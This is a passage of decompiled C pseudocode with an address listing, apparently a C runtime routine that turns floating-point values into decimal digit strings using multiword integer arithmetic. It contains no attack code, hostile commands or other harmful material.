																	if(_t1233 >= _t1022) {
																		_t1192 = 0;
																		__eflags = 0;
																	} else {
																		_t1192 =  *_t1004;
																	}
																	__eflags = _t1233 - 1 - _t1022;
																	if(_t1233 - 1 >= _t1022) {
																		_t1006 = 0;
																		__eflags = 0;
																	} else {
																		_t1006 =  *(_v1872 - 4);
																	}
																	_t1099 = _v1892;
																	 *(_t1235 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1192 & _v1884) << _v1888;
																	_t1094 = _t1099 - 1;
																	_t1233 = _t1233 - 1;
																	_t1004 = _v1872 - 4;
																	_v1892 = _t1094;
																	_v1872 = _t1004;
																	__eflags = _t1094 - 0xffffffff;
																	if(_t1094 != 0xffffffff) {
																		_t1022 = _v472;
																		continue;
																	}
																	break;
																}
																_t1142 = _v1880;
																_t1231 = _v1876;
															}
															__eflags = _t1231;
															if(_t1231 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1231 << 2);
																_t1237 =  &(_t1237[3]);
															}
															__eflags = _v1865;
															_t1025 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1142;
															} else {
																_v472 = _t1142 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t999 = 4;
													__eflags = 1;
													_v1396 = _t999;
													_v1400 = 1;
													_v936 = 1;
													_push(_t999);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1025);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[4]);
									}
									_t782 = _v1904;
									_t1043 = 0xa;
									_v1912 = _t1043;
									__eflags = _t782;
									if(_t782 < 0) {
										_t783 =  ~_t782;
										_t784 = _t783 / _t1043;
										_v1880 = _t784;
										_t1044 = _t783 % _t1043;
										_v1884 = _t1044;
										__eflags = _t784;
										if(_t784 == 0) {
											L249:
											__eflags = _t1044;
											if(_t1044 != 0) {
												_t820 =  *(0x458644 + _t1044 * 4);
												_v1896 = _t820;
												__eflags = _t820;
												if(_t820 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t820 - 1;
													if(_t820 != 1) {
														_t1055 = _v472;
														__eflags = _t1055;
														if(_t1055 != 0) {
															_t1161 = 0;
															_t1213 = 0;
															__eflags = 0;
															do {
																_t1113 = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) >> 0x20;
																 *(_t1235 + _t1213 * 4 - 0x1d0) = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) + _t1161;
																_t820 = _v1896;
																asm("adc edx, 0x0");
																_t1213 = _t1213 + 1;
																_t1161 = _t1113;
																__eflags = _t1213 - _t1055;
															} while (_t1213 != _t1055);
															__eflags = _t1161;
															if(_t1161 != 0) {
																_t826 = _v472;
																__eflags = _t826 - 0x73;
																if(_t826 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1235 + _t826 * 4 - 0x1d0) = _t1161;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t784 - 0x26;
												if(_t784 > 0x26) {
													_t784 = 0x26;
												}
												_t1056 =  *(0x4585ae + _t784 * 4) & 0x000000ff;
												_v1872 = _t784;
												_v1400 = ( *(0x4585ae + _t784 * 4) & 0x000000ff) + ( *(0x4585af + _t784 * 4) & 0x000000ff);
												E00431810(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
												_t837 = L00431DF0( &(( &_v1396)[_t1056]), 0x457ca8 + ( *(0x4585ac + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x4585af + _t784 * 4) & 0x000000ff) << 2);
												_t1057 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1057;
												__eflags = _t1057 - 1;
												if(_t1057 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1057 - _v472;
														_t1164 =  &_v1396;
														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
														__eflags = _t838;
														if(_t838 != 0) {
															_t1114 =  &_v468;
														} else {
															_t1164 =  &_v468;
															_t1114 =  &_v1396;
														}
														_v1908 = _t1114;
														__eflags = _t838;
														if(_t838 == 0) {
															_t1057 = _v472;
														}
														_v1876 = _t1057;
														__eflags = _t838;
														if(_t838 != 0) {
															_v1892 = _v472;
														}
														_t1115 = 0;
														_t1215 = 0;
														_v1864 = 0;
														__eflags = _t1057;
														if(_t1057 == 0) {
															L243:
															_v472 = _t1115;
															_t840 = _t1115 << 2;
															__eflags = _t840;
															_push(_t840);
															_t841 =  &_v1860;
															goto L244;
														} else {
															_t1165 = _t1164 -  &_v1860;
															__eflags = _t1165;
															_v1928 = _t1165;
															do {
																_t847 =  *(_t1235 + _t1165 + _t1215 * 4 - 0x740);
																_v1896 = _t847;
																__eflags = _t847;
																if(_t847 != 0) {
																	_t848 = 0;
																	_t1166 = 0;
																	_t1058 = _t1215;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1058 - 0x73;
																		if(_t1058 == 0x73) {
																			goto L258;
																		} else {
																			_t1165 = _v1928;
																			_t1057 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1058 - 0x73;
																			if(_t1058 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1058 - _t1115;
																			if(_t1058 == _t1115) {
																				 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																				_t859 = _t848 + 1 + _t1215;
																				__eflags = _t859;
																				_v1864 = _t859;
																				_t848 = _v1888;
																			}
																			_t854 =  *(_v1908 + _t848 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1166;
																			asm("adc edx, 0x0");
																			_t848 = _v1888 + 1;
																			_t1058 = _t1058 + 1;
																			_v1888 = _t848;
																			_t1166 = _t854 * _v1896 >> 0x20;
																			_t1115 = _v1864;
																			__eflags = _t848 - _v1892;
																			if(_t848 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1166;
																				if(_t1166 == 0) {
																					goto L240;
																				}
																				__eflags = _t1058 - 0x73;
																				if(_t1058 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1058 - _t1115;
																					if(_t1058 == _t1115) {
																						_t558 = _t1235 + _t1058 * 4 - 0x740;
																						 *_t558 =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1058 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t852 = _t1166;
																					_t1166 = 0;
																					 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t852;
																					_t1115 = _v1864;
																					asm("adc edi, edi");
																					_t1058 = _t1058 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1215 - _t1115;
																	if(_t1215 == _t1115) {
																		 *(_t1235 + _t1215 * 4 - 0x740) =  *(_t1235 + _t1215 * 4 - 0x740) & _t847;
																		_t526 = _t1215 + 1; // 0x1
																		_t1115 = _t526;
																		_v1864 = _t1115;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1215 = _t1215 + 1;
																__eflags = _t1215 - _t1057;
															} while (_t1215 != _t1057);
															goto L243;
														}
													} else {
														_t1167 = _v468;
														_push(_t1057 << 2);
														_v472 = _t1057;
														_push( &_v1396);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1241 =  &(_t1241[4]);
														__eflags = _t1167;
														if(_t1167 == 0) {
															goto L203;
														} else {
															__eflags = _t1167 - 1;
															if(_t1167 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1059 = 0;
																	_v1896 = _v472;
																	_t1216 = 0;
																	__eflags = 0;
																	do {
																		_t867 = _t1167;
																		_t1116 = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) >> 0x20;
																		 *(_t1235 + _t1216 * 4 - 0x1d0) = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) + _t1059;
																		asm("adc edx, 0x0");
																		_t1216 = _t1216 + 1;
																		_t1059 = _t1116;
																		__eflags = _t1216 - _v1896;
																	} while (_t1216 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1168 = _v1396;
													__eflags = _t1168;
													if(_t1168 != 0) {
														__eflags = _t1168 - 1;
														if(_t1168 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1060 = 0;
																_v1896 = _v472;
																_t1217 = 0;
																__eflags = 0;
																do {
																	_t872 = _t1168;
																	_t1117 = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) >> 0x20;
																	 *(_t1235 + _t1217 * 4 - 0x1d0) = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) + _t1060;
																	asm("adc edx, 0x0");
																	_t1217 = _t1217 + 1;
																	_t1060 = _t1117;
																	__eflags = _t1217 - _v1896;
																} while (_t1217 != _v1896);
																L208:
																__eflags = _t1059;
																if(_t1059 == 0) {
																	goto L245;
																} else {
																	_t870 = _v472;
																	__eflags = _t870 - 0x73;
																	if(_t870 >= 0x73) {
																		L258:
																		_push(0);
																		_v2408 = 0;
																		_v472 = 0;
																		_push( &_v2404);
																		_push(_t1025);
																		_push( &_v468);
																		L313();
																		_t1241 =  &(_t1241[4]);
																		_t843 = 0;
																	} else {
																		 *(_t1235 + _t870 * 4 - 0x1d0) = _t1059;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t841 =  &_v2404;
														L244:
														_push(_t841);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1241 =  &(_t1241[4]);
														L245:
														_t843 = 1;
													}
												}
												L246:
												__eflags = _t843;
												if(_t843 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t823 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t784 = _v1880 - _v1872;
												__eflags = _t784;
												_v1880 = _t784;
											} while (_t784 != 0);
											_t1044 = _v1884;
											goto L249;
										}
									} else {
										_t875 = _t782 / _t1043;
										_v1908 = _t875;
										_t1061 = _t782 % _t1043;
										_v1896 = _t1061;
										__eflags = _t875;
										if(_t875 == 0) {
											L184:
											__eflags = _t1061;
											if(_t1061 != 0) {
												_t1169 =  *(0x458644 + _t1061 * 4);
												__eflags = _t1169;
												if(_t1169 != 0) {
													__eflags = _t1169 - 1;
													if(_t1169 != 1) {
														_t876 = _v936;
														_v1896 = _t876;
														__eflags = _t876;
														if(_t876 != 0) {
															_t1218 = 0;
															_t1062 = 0;
															__eflags = 0;
															do {
																_t877 = _t1169;
																_t1121 = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) >> 0x20;
																 *(_t1235 + _t1062 * 4 - 0x3a0) = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) + _t1218;
																asm("adc edx, 0x0");
																_t1062 = _t1062 + 1;
																_t1218 = _t1121;
																__eflags = _t1062 - _v1896;
															} while (_t1062 != _v1896);
															__eflags = _t1218;
															if(_t1218 != 0) {
																_t880 = _v936;
																__eflags = _t880 - 0x73;
																if(_t880 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1235 + _t880 * 4 - 0x3a0) = _t1218;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t875 - 0x26;
												if(_t875 > 0x26) {
													_t875 = 0x26;
												}
												_t1063 =  *(0x4585ae + _t875 * 4) & 0x000000ff;
												_v1888 = _t875;
												_v1400 = ( *(0x4585ae + _t875 * 4) & 0x000000ff) + ( *(0x4585af + _t875 * 4) & 0x000000ff);
												E00431810(_t1063 << 2,  &_v1396, 0, _t1063 << 2);
												_t893 = L00431DF0( &(( &_v1396)[_t1063]), 0x457ca8 + ( *(0x4585ac + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x4585af + _t875 * 4) & 0x000000ff) << 2);
												_t1064 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1064;
												__eflags = _t1064 - 1;
												if(_t1064 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1064 - _v936;
														_t1172 =  &_v1396;
														_t894 = _t893 & 0xffffff00 | _t1064 - _v936 > 0x00000000;
														__eflags = _t894;
														if(_t894 != 0) {
															_t1122 =  &_v932;
														} else {
															_t1172 =  &_v932;
															_t1122 =  &_v1396;
														}
														_v1876 = _t1122;
														__eflags = _t894;
														if(_t894 == 0) {
															_t1064 = _v936;
														}
														_v1880 = _t1064;
														__eflags = _t894;
														if(_t894 != 0) {
															_v1892 = _v936;
														}
														_t1123 = 0;
														_t1220 = 0;
														_v1864 = 0;
														__eflags = _t1064;
														if(_t1064 == 0) {
															L177:
															_v936 = _t1123;
															_t896 = _t1123 << 2;
															__eflags = _t896;
															goto L178;
														} else {
															_t1173 = _t1172 -  &_v1860;
															__eflags = _t1173;
															_v1928 = _t1173;
															do {
																_t903 =  *(_t1235 + _t1173 + _t1220 * 4 - 0x740);
																_v1884 = _t903;
																__eflags = _t903;
																if(_t903 != 0) {
																	_t904 = 0;
																	_t1174 = 0;
																	_t1065 = _t1220;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1065 - 0x73;
																		if(_t1065 == 0x73) {
																			goto L187;
																		} else {
																			_t1173 = _v1928;
																			_t1064 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1065 - 0x73;
																			if(_t1065 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1065 - _t1123;
																			if(_t1065 == _t1123) {
																				 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) & 0x00000000;
																				_t915 = _t904 + 1 + _t1220;
																				__eflags = _t915;
																				_v1864 = _t915;
																				_t904 = _v1872;
																			}
																			_t910 =  *(_v1876 + _t904 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) + _t910 * _v1884 + _t1174;
																			asm("adc edx, 0x0");
																			_t904 = _v1872 + 1;
																			_t1065 = _t1065 + 1;
																			_v1872 = _t904;
																			_t1174 = _t910 * _v1884 >> 0x20;
																			_t1123 = _v1864;
																			__eflags = _t904 - _v1892;
																			if(_t904 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1174;
																				if(_t1174 == 0) {
																					goto L174;
																				}
																				__eflags = _t1065 - 0x73;
																				if(_t1065 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t906 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1065 - _t1123;
																					if(_t1065 == _t1123) {
																						_t370 = _t1235 + _t1065 * 4 - 0x740;
																						 *_t370 =  *(_t1235 + _t1065 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1065 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t908 = _t1174;
																					_t1174 = 0;
																					 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) + _t908;
																					_t1123 = _v1864;
																					asm("adc edi, edi");
																					_t1065 = _t1065 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1220 - _t1123;
																	if(_t1220 == _t1123) {
																		 *(_t1235 + _t1220 * 4 - 0x740) =  *(_t1235 + _t1220 * 4 - 0x740) & _t903;
																		_t338 = _t1220 + 1; // 0x1
																		_t1123 = _t338;
																		_v1864 = _t1123;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1220 = _t1220 + 1;
																__eflags = _t1220 - _t1064;
															} while (_t1220 != _t1064);
															goto L177;
														}
													} else {
														_t1175 = _v932;
														_push(_t1064 << 2);
														_v936 = _t1064;
														_push( &_v1396);
														_push(_t1025);
														_push( &_v932);
														L313();
														_t1241 =  &(_t1241[4]);
														__eflags = _t1175;
														if(_t1175 != 0) {
															__eflags = _t1175 - 1;
															if(_t1175 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1066 = 0;
																	_v1884 = _v936;
																	_t1221 = 0;
																	__eflags = 0;
																	do {
																		_t922 = _t1175;
																		_t1124 = _t922 *  *(_t1235 + _t1221 * 4 - 0x3a0) >> 0x20;
																		 *(_t1235 + _t1221 * 4 - 0x3a0) = _t922 *  *(_t1235 + _t1221 * 4 - 0x3a0) + _t1066;
																		asm("adc edx, 0x0");
																		_t1221 = _t1221 + 1;
																		_t1066 = _t1124;
																		__eflags = _t1221 - _v1884;
																	} while (_t1221 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t897 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1176 = _v1396;
													__eflags = _t1176;
													if(_t1176 != 0) {
														__eflags = _t1176 - 1;
														if(_t1176 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1067 = 0;
																_v1884 = _v936;
																_t1222 = 0;
																__eflags = 0;
																do {
																	_t929 = _t1176;
																	_t1125 = _t929 *  *(_t1235 + _t1222 * 4 - 0x3a0) >> 0x20;
																	 *(_t1235 + _t1222 * 4 - 0x3a0) = _t929 *  *(_t1235 + _t1222 * 4 - 0x3a0) + _t1067;
																	asm("adc edx, 0x0");
																	_t1222 = _t1222 + 1;
																	_t1067 = _t1125;
																	__eflags = _t1222 - _v1884;
																} while (_t1222 != _v1884);
																L149:
																__eflags = _t1066;
																if(_t1066 == 0) {
																	goto L180;
																} else {
																	_t925 = _v936;
																	__eflags = _t925 - 0x73;
																	if(_t925 < 0x73) {
																		 *(_t1235 + _t925 * 4 - 0x3a0) = _t1066;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t906 =  &_v1396;
																		L188:
																		_push(_t906);
																		_push(_t1025);
																		_push( &_v932);
																		L313();
																		_t1241 =  &(_t1241[4]);
																		_t899 = 0;
																	}
																}
															}
														}
													} else {
														_t896 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t896);
														_t897 =  &_v1860;
														L179:
														_push(_t897);
														_push(_t1025);
														_push( &_v932);
														L313();
														_t1241 =  &(_t1241[4]);
														L180:
														_t899 = 1;
													}
												}
												L181:
												__eflags = _t899;
												if(_t899 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t823 =  &_v932;
													L262:
													_push(_t1025);
													_push(_t823);
													L313();
													_t1241 =  &(_t1241[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t875 = _v1908 - _v1888;
												__eflags = _t875;
												_v1908 = _t875;
											} while (_t875 != 0);
											_t1061 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1156 = _v1920;
									_t1208 = _t1156;
									_t1045 = _v472;
									_v1872 = _t1208;
									__eflags = _t1045;
									if(_t1045 != 0) {
										_t1212 = 0;
										_t1160 = 0;
										__eflags = 0;
										do {
											_t813 =  *(_t1235 + _t1160 * 4 - 0x1d0);
											_t1111 = 0xa;
											_t1112 = _t813 * _t1111 >> 0x20;
											 *(_t1235 + _t1160 * 4 - 0x1d0) = _t813 * _t1111 + _t1212;
											asm("adc edx, 0x0");
											_t1160 = _t1160 + 1;
											_t1212 = _t1112;
											__eflags = _t1160 - _t1045;
										} while (_t1160 != _t1045);
										_v1896 = _t1212;
										__eflags = _t1212;
										_t1208 = _v1872;
										if(_t1212 != 0) {
											_t1054 = _v472;
											__eflags = _t1054 - 0x73;
											if(_t1054 >= 0x73) {
												__eflags = 0;
												_push(0);
												_v2408 = 0;
												_v472 = 0;
												_push( &_v2404);
												_push(_t1025);
												_push( &_v468);
												L313();
												_t1241 =  &(_t1241[4]);
											} else {
												 *(_t1235 + _t1054 * 4 - 0x1d0) = _t1112;
												_v472 = _v472 + 1;
											}
										}
										_t1156 = _t1208;
									}
									_t787 = E0043E6E0( &_v472,  &_v936);
									_t1104 = 0xa;
									__eflags = _t787 - _t1104;
									if(_t787 != _t1104) {
										__eflags = _t787;
										if(_t787 != 0) {
											_t788 = _t787 + 0x30;
											__eflags = _t788;
											_t1208 = _t1156 + 1;
											 *_t1156 = _t788;
											_v1872 = _t1208;
											goto L282;
										} else {
											_t789 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1208 = _t1156 + 1;
										_t805 = _v936;
										 *_t1156 = 0x31;
										_v1872 = _t1208;
										__eflags = _t805;
										if(_t805 != 0) {
											_t1159 = 0;
											_t1211 = _t805;
											_t1053 = 0;
											__eflags = 0;
											do {
												_t806 =  *(_t1235 + _t1053 * 4 - 0x3a0);
												 *(_t1235 + _t1053 * 4 - 0x3a0) = _t806 * _t1104 + _t1159;
												asm("adc edx, 0x0");
												_t1053 = _t1053 + 1;
												_t1159 = _t806 * _t1104 >> 0x20;
												_t1104 = 0xa;
												__eflags = _t1053 - _t1211;
											} while (_t1053 != _t1211);
											_t1208 = _v1872;
											__eflags = _t1159;
											if(_t1159 != 0) {
												_t809 = _v936;
												__eflags = _t809 - 0x73;
												if(_t809 >= 0x73) {
													_push(0);
													_v2408 = 0;
													_v936 = 0;
													_push( &_v2404);
													_push(_t1025);
													_push( &_v932);
													L313();
													_t1241 =  &(_t1241[4]);
												} else {
													 *(_t1235 + _t809 * 4 - 0x3a0) = _t1159;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t789 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t789;
									_t1031 = _v1916;
									__eflags = _t789;
									if(_t789 >= 0) {
										__eflags = _t1031 - 0x7fffffff;
										if(_t1031 <= 0x7fffffff) {
											_t1031 = _t1031 + _t789;
											__eflags = _t1031;
										}
									}
									_t791 = _a24 - 1;
									__eflags = _t791 - _t1031;
									if(_t791 >= _t1031) {
										_t791 = _t1031;
									}
									_t792 = _t791 + _v1920;
									_v1916 = _t792;
									__eflags = _t1208 - _t792;
									if(__eflags != 0) {
										while(1) {
											_t793 = _v472;
											__eflags = _t793;
											if(__eflags == 0) {
												goto L303;
											}
											_t1157 = 0;
											_t1209 = _t793;
											_t1049 = 0;
											__eflags = 0;
											do {
												_t794 =  *(_t1235 + _t1049 * 4 - 0x1d0);
												 *(_t1235 + _t1049 * 4 - 0x1d0) = _t794 * 0x3b9aca00 + _t1157;
												asm("adc edx, 0x0");
												_t1049 = _t1049 + 1;
												_t1157 = _t794 * 0x3b9aca00 >> 0x20;
												__eflags = _t1049 - _t1209;
											} while (_t1049 != _t1209);
											_t1210 = _v1872;
											__eflags = _t1157;
											if(_t1157 != 0) {
												_t800 = _v472;
												__eflags = _t800 - 0x73;
												if(_t800 >= 0x73) {
													__eflags = 0;
													_push(0);
													_v2408 = 0;
													_v472 = 0;
													_push( &_v2404);
													_push(_t1025);
													_push( &_v468);
													L313();
													_t1241 =  &(_t1241[4]);
												} else {
													 *(_t1235 + _t800 * 4 - 0x1d0) = _t1157;
													_v472 = _v472 + 1;
												}
											}
											_t799 = E0043E6E0( &_v472,  &_v936);
											_t1158 = 8;
											_t1031 = _v1916 - _t1210;
											__eflags = _t1031;
											do {
												_t708 = _t799 % _v1912;
												_t799 = _t799 / _v1912;
												_t1109 = _t708 + 0x30;
												__eflags = _t1031 - _t1158;
												if(_t1031 >= _t1158) {
													 *((char*)(_t1158 + _t1210)) = _t1109;
												}
												_t1158 = _t1158 - 1;
												__eflags = _t1158 - 0xffffffff;
											} while (_t1158 != 0xffffffff);
											__eflags = _t1031 - 9;
											if(_t1031 > 9) {
												_t1031 = 9;
											}
											_t1208 = _t1210 + _t1031;
											_v1872 = _t1208;
											__eflags = _t1208 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1208 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1031 = _t1196 & 0x000fffff;
					if((_t1146 | _t1196 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push("0");
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1016);
						if(E004405A6() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0043629A();
							asm("int3");
							_push(_t1235);
							_push(_t1196);
							_t1197 = _v2424;
							__eflags = _t1197;
							if(_t1197 != 0) {
								_t740 = _v0;
								__eflags = _t740;
								if(_t740 != 0) {
									_push(_t1146);
									_t1147 = _a8;
									__eflags = _t1147;
									if(_t1147 == 0) {
										L320:
										E00431810(_t1147, _t740, 0, _a4);
										__eflags = _t1147;
										if(_t1147 != 0) {
											__eflags = _a4 - _t1197;
											if(_a4 >= _t1197) {
												_t742 = 0x16;
											} else {
												_t743 = L00439E14();
												_push(0x22);
												goto L324;
											}
										} else {
											_t743 = L00439E14();
											_push(0x16);
											L324:
											_pop(_t1199);
											 *_t743 = _t1199;
											E0043626D();
											_t742 = _t1199;
										}
									} else {
										__eflags = _a4 - _t1197;
										if(_a4 < _t1197) {
											goto L320;
										} else {
											L00431DF0(_t740, _t1147, _t1197);
											_t742 = 0;
										}
									}
								} else {
									_t746 = L00439E14();
									_t1200 = 0x16;
									 *_t746 = _t1200;
									E0043626D();
									_t742 = _t1200;
								}
							} else {
								_t742 = 0;
							}
							return _t742;
						} else {
							L309:
							_t1248 = _v1936;
							if(_v1936 != 0) {
								E0044F703(_t1031, _t1248,  &_v1944);
							}
							return E0042F61B(_v8 ^ _t1235);
						}
					}
				}
			}

0x0044c575
0x0044c57c
0x0044c580
0x0044c58b
0x0044c58e
0x0044c594
0x0044c59a
0x0044c59f
0x0044c5ae
0x0044c5b0
0x0044c5b2
0x0044c5b2
0x0044c5b9
0x0044c5c3
0x0044c5c8
0x0044c5cb
0x0044c5ef
0x0044c5f3
0x0044c5f8
0x0044c5f9
0x0044c5fb
0x0044c5fd
0x0044c603
0x0044c603
0x0044c60a
0x0044c60a
0x0044c60d
0x0044d8bd
0x00000000
0x0044c613
0x0044c613
0x0044c613
0x0044c616
0x0044d8b6
0x00000000
0x0044c61c
0x0044c61c
0x0044c61c
0x0044c61f
0x0044d8af
0x00000000
0x0044c625
0x0044c625
0x0044c628
0x0044d8a8
0x00000000
0x0044c62e
0x0044c637
0x0044c63f
0x0044c642
0x0044c645
0x0044c648
0x0044c64e
0x0044c656
0x0044c65c
0x0044c666
0x0044c666
0x0044c669
0x0044c671
0x0044c678
0x0044c678
0x0044c66b
0x0044c66b
0x0044c66d
0x0044c680
0x0044c686
0x0044c688
0x0044c68c
0x0044c691
0x0044c69e
0x0044c6a0
0x0044c6a6
0x0044c6ab
0x0044c6ac
0x0044c6ad
0x0044c6b7
0x0044c6bc
0x0044c6c2
0x0044c6c7
0x0044c6d0
0x0044c6d0
0x0044c6d2
0x0044c6c9
0x0044c6c9
0x0044c6ce
0x00000000
0x00000000
0x0044c6ce
0x0044c6d8
0x0044c6e0
0x0044c6e2
0x0044c6eb
0x0044c6ec
0x0044c6f2
0x0044c6f4
0x0044cae7
0x0044caed
0x0044cc0c
0x0044cc0c
0x0044cc13
0x0044cc13
0x0044cc13
0x0044cc1a
0x0044cc1d
0x0044cc24
0x0044cc24
0x0044cc1f
0x0044cc1f
0x0044cc1f
0x0044cc28
0x0044cc29
0x0044cc2b
0x0044cc2e
0x0044cc31
0x0044cc34
0x0044cc3a
0x0044cc3d
0x0044cc40
0x0044cc4a
0x0044cc4a
0x0044cc4a
0x0044cc42
0x0044cc42
0x0044cc44
0x00000000
0x0044cc46
0x0044cc46
0x0044cc46
0x0044cc44
0x0044cc4c
0x0044cc4e
0x0044ccef
0x0044ccef
0x0044ccfc
0x0044ccfc
0x0044ccfc
0x0044cd03
0x0044cd05
0x0044cd0c
0x0044cd11
0x0044cd12
0x0044cd17
0x0044cc54
0x0044cc54
0x0044cc56
0x00000000
0x0044cc5c
0x0044cc5e
0x0044cc5f
0x0044cc61
0x0044cc63
0x0044cc63
0x0044cc65
0x0044cc68
0x0044cc70
0x0044cc72
0x0044cc75
0x0044cc7b
0x0044cc7b
0x0044cc7d
0x0044cc89
0x0044cc89
0x0044cc89
0x0044cc7f
0x0044cc81
0x0044cc81
0x0044cc90
0x0044cc93
0x0044cc95
0x0044cc9c
0x0044cc9c
0x0044cc97
0x0044cc97
0x0044cc97
0x0044cca4
0x0044ccae
0x0044ccb4
0x0044ccb5
0x0044ccba
0x0044ccc0
0x0044ccc3
0x00000000
0x00000000
0x0044ccc5
0x0044ccc5
0x0044cccd
0x0044cccd
0x0044ccd3
0x0044ccda
0x0044cce7
0x0044ccdc
0x0044ccdc
0x0044ccdf
0x0044ccdf
0x0044ccda
0x0044cc56
0x0044cd23
0x0044cd33
0x0044cd40
0x0044cd42
0x0044cd49
0x0044caf3
0x0044caf3
0x0044cafc
0x0044cafd
0x0044cb07
